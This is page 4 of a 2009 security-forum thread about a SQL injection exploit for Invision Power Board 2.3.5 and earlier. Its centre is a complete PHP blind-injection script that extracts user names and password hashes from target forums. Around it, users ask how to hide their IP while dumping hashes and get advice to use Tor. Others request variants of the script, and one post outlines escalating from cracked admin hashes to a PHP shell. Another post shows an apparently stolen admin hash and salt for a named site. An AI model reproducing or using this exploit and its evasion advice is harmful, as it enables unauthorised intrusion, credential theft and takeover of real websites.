|
|
|
|
|
|
IT Security and Insecurity Portal |
|
Posted: Thu Jan 22, 2009 5:34 pm |
|
|
OpenMASK |
Regular user |
|
|
Joined: Jan 22, 2009 |
Posts: 6 |
|
|
|
|
|
|
|
waraxe wrote: | It's probably vulnerable, because 2 test are passing, but for some reason sql error occurs in later phase. Why - i have no idea. You must debug the script (use echo, print or similar in right places) and try to find out server response. If needed, then there can be more ways to fetch data from the same sql injection. Just be creative |
Thank u very much man!! ))) |
|
|
|
|
Posted: Thu Feb 26, 2009 3:45 am |
|
|
AciddTripp |
Beginner |
|
|
Joined: Feb 26, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
Thanks for the exploit, works great.
One question, what is the risk of my ip address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself? |
|
|
|
|
|
|
|
|
Posted: Thu Feb 26, 2009 2:16 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
AciddTripp wrote: | Thanks for the exploit, works great.
One question, what is the risk of my ip address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself? |
It's wise to hide your IP of course. From exploit source:
Code: |
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
|
Just uncomment needed lines and use proxy. My suggestion is Tor:
http://vidalia-project.net
Tor is slow, but bulletproof for most operations |
|
|
|
|
Posted: Fri May 01, 2009 12:26 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun May 03, 2009 5:47 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
As far as specifix AJAX function is accessible and sql injection really exists, this exploit should work. |
|
|
|
|
Posted: Mon May 04, 2009 12:06 am |
|
|
ba9ba9 |
Active user |
|
|
Joined: Feb 11, 2009 |
Posts: 46 |
|
|
|
|
|
|
|
waraxe wrote: |
As far as specifix AJAX function is accessible and sql injection really exists, this exploit should work. |
its is any methode to get the prefix of a forum beacause ibf_ dont work |
|
|
|
|
Posted: Mon Aug 17, 2009 5:17 pm |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
hi,
can this exploit be modified so you can get the admin login logs? that would be useful as it shows the number of characters and last character of the password so its a little easier to figure it out.
thank you. |
|
|
|
|
|
Modification |
|
Posted: Sun Aug 23, 2009 3:55 pm |
|
|
RG007145 |
Active user |
|
|
Joined: May 04, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
A quick modification (made in a big hurry) to fetch the login username given people's ID:
Note: It says finding hash but it's finding the username. And [a-f] means [A-z] since I'm so lazy.
Note 2: A "0" in the username means a space. One or multiple "0"s after the username means it's done.
Code: |
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.2
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 24. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. can work with multiple ID-s
// 6. log format compatible with passwordspro
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb/';
$id_start = 1;// starting user ID, default value "1" is admin's ID
$id_end = 10;// ending user ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
if(!extension_loaded('curl'))
{
if(!dl('php_curl.dll'))
{
die("Curl extension not loaded!\n Fatal exit ...\n");
}
else
{
echo "Curl loading success\n";
}
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
@set_time_limit(0);
}
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("Target: $url");
for($i = $id_start; $i <= $id_end; $i ++)
{
echo "Testing ID $i\n";
if(!test_target_id($i))
{
echo "ID $i not valid, passing ...\n";
continue;
}
echo "ID $i validated\n";
$hash = get_hash($i);
$salt = '';
$line = "$i:$hash:$salt";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
}
add_line("------------------------------------------");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'notfound')
{
die('Target is patched? Exiting ...');
}
if($buff !== 'found')
{
die('Invalid response, target URL not valid? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function test_target_id($id)
{
global $url, $prefix;
$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
return test_condition($post);
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
global $prefix;
$char = '';
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members WHERE id=$id AND ORD(SUBSTR(name,$pos,1))";
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 65;
$max = 122;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);
while(1)
{
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'found')
{
$bret = true;
break;
}
elseif($buff === 'notfound')
{
break;
}
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
//////////////////////////////////////////////////////////////////////
?>
|
|
|
|
|
|
|
|
|
|
Posted: Mon Aug 24, 2009 3:21 am |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
Nice, can you modify it so you can get the admin login logs with it? |
|
|
|
|
Posted: Thu Oct 22, 2009 7:35 am |
|
|
Meithal |
Beginner |
|
|
Joined: Oct 22, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
tere!
Is there any mean to use this exploit for UPDATE a table? It's a question of LIFE or DEATH. Thank you! |
|
|
|
|
Posted: Thu Oct 22, 2009 9:59 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Meithal wrote: | tere!
Is there any mean to use this exploit for UPDATE a table? It's a question of LIFE or DEATH. Thank you! |
Tere
In case of php/mysql combination there is no stacked (multiple) sql queries allowed. So you need sql injection vulnerability in UPDATE query in order to manipulate specific table in writable manner.
My IPB exploit is based on sql injection in SELECT query, so it is not able to UPDATE directly. But if you can fetch admin hash(-es) and they are crackable, then IPB admin level and finally PHP code level are possible (php shell). Which means, that you can modify sql database from php. |
|
|
|
|
Posted: Thu Oct 22, 2009 10:40 am |
|
|
Meithal |
Beginner |
|
|
Joined: Oct 22, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
ok thanks, of course the sql shell don't allow to update the tables you need, but there is still the template bits where there is many php code, let's go here |
|
|
|
|
|
not work |
|
Posted: Wed Nov 04, 2009 12:21 pm |
|
|
Doky |
Beginner |
|
|
Joined: Nov 04, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
Hy,not working...
Script generate hash & salt.. not work:(
------------------------------------------
User ID: 142348 (Root admin)
Hash: 00d2594a7a719d383ad178778951461b
Salt: UVe3'
------------------------------------------
www.netmozi.com
not work,not login.. :S
test pls thx |
|
|
|
|
Posted: Sat Nov 07, 2009 11:33 pm |
|
|
RG007145 |
Active user |
|
|
Joined: May 04, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
You're not allowed to post websites... |
|
|
|
|
Posted: Thu Dec 10, 2009 1:09 am |
|
|
AgentJ9 |
Active user |
|
|
Joined: Sep 07, 2008 |
Posts: 26 |
|
|
|
|
|
|
|
does it still work? & what version of PHP will i need? |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 4 of 6
Goto page Previous1, 2, 3, 4, 5, 6Next
|
|
|
|
|
|
Powered by phpBB � 2001-2008 phpBB Group
|
|
|
|
|